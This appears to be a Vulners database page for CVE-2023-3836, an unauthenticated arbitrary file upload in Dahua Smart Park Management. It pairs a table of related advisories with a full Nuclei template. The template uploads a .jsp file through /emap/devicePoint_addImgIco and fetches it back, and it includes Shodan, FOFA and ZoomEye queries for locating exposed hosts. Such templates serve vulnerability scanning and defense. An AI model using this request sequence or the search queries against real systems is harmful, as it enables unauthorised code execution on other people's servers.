| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Dahuasecurity Smart_Parking_Management | 30 Aug 202312:11 | – | githubexploit | |
| The vulnerability of the /emap/devicePoint_addImgIco?hasSubsystem=true file is related to the unlimited loading of dangerous files. This vulnerability allows a violator to execute arbitrary code. | 4 Nov 202300:00 | – | bdu_fstec | |
| CVE-2023-3836 | 20 Aug 202320:43 | – | circl | |
| Dahua Smart Parking Management 代码问题漏洞 | 22 Jul 202300:00 | – | cnnvd | |
| CVE-2023-3836 | 22 Jul 202318:00 | – | cve | |
| CVE-2023-3836 Dahua Smart Park Management unrestricted upload | 22 Jul 202318:00 | – | cvelist | |
| CVE-2023-3836 | 22 Jul 202318:15 | – | nvd | |
| CVE-2023-3836 | 22 Jul 202318:15 | – | osv | |
| Out-of-bounds | 22 Jul 202318:15 | – | prion | |
| PT-2023-6727 · Dahua · Dahua Smart Parking Management | 22 Jul 202300:00 | – | ptsecurity |
id: CVE-2023-3836
info:
name: Dahua Smart Park Management - Arbitrary File Upload
author: HuTa0
severity: critical
description: |
Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
impact: |
Unauthenticated attackers can upload arbitrary files to the Dahua wisdom park management platform, potentially enabling remote code execution and complete system compromise.
remediation: |
Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
reference:
- https://github.com/qiuhuihk/cve/blob/main/upload.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- https://vuldb.com/?ctiid.235162
- https://vuldb.com/?id.235162
- https://github.com/1f3lse/taiE
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3836
cwe-id: CWE-434
epss-score: 0.73525
epss-percentile: 0.99401
cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: dahuasecurity
product: smart_parking_management
shodan-query:
- html:"/WPMS/asset"
- http.html:"/wpms/asset"
fofa-query: body="/wpms/asset"
zoomeye-query: app="大华智慧园区综合管理平台"
tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity,vkev,vuln
variables:
random_str: "{{rand_base(6)}}"
match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
{{match_str}}
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{match_str}}')"
condition: and
extractors:
- type: regex
name: shell_filename
internal: true
part: body_1
regex:
- 'ico_res_(\w+)_on\.jsp'
# digest: 4a0a004730450220507e2b8e19ec929db32777acd33f6a30031ee4a67b3573808d20b6cb78270a35022100d2676ca47a5fc1d0a7a34bed0760cbe700123d4dd36ef4b3f3709c6ff1c26eb8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation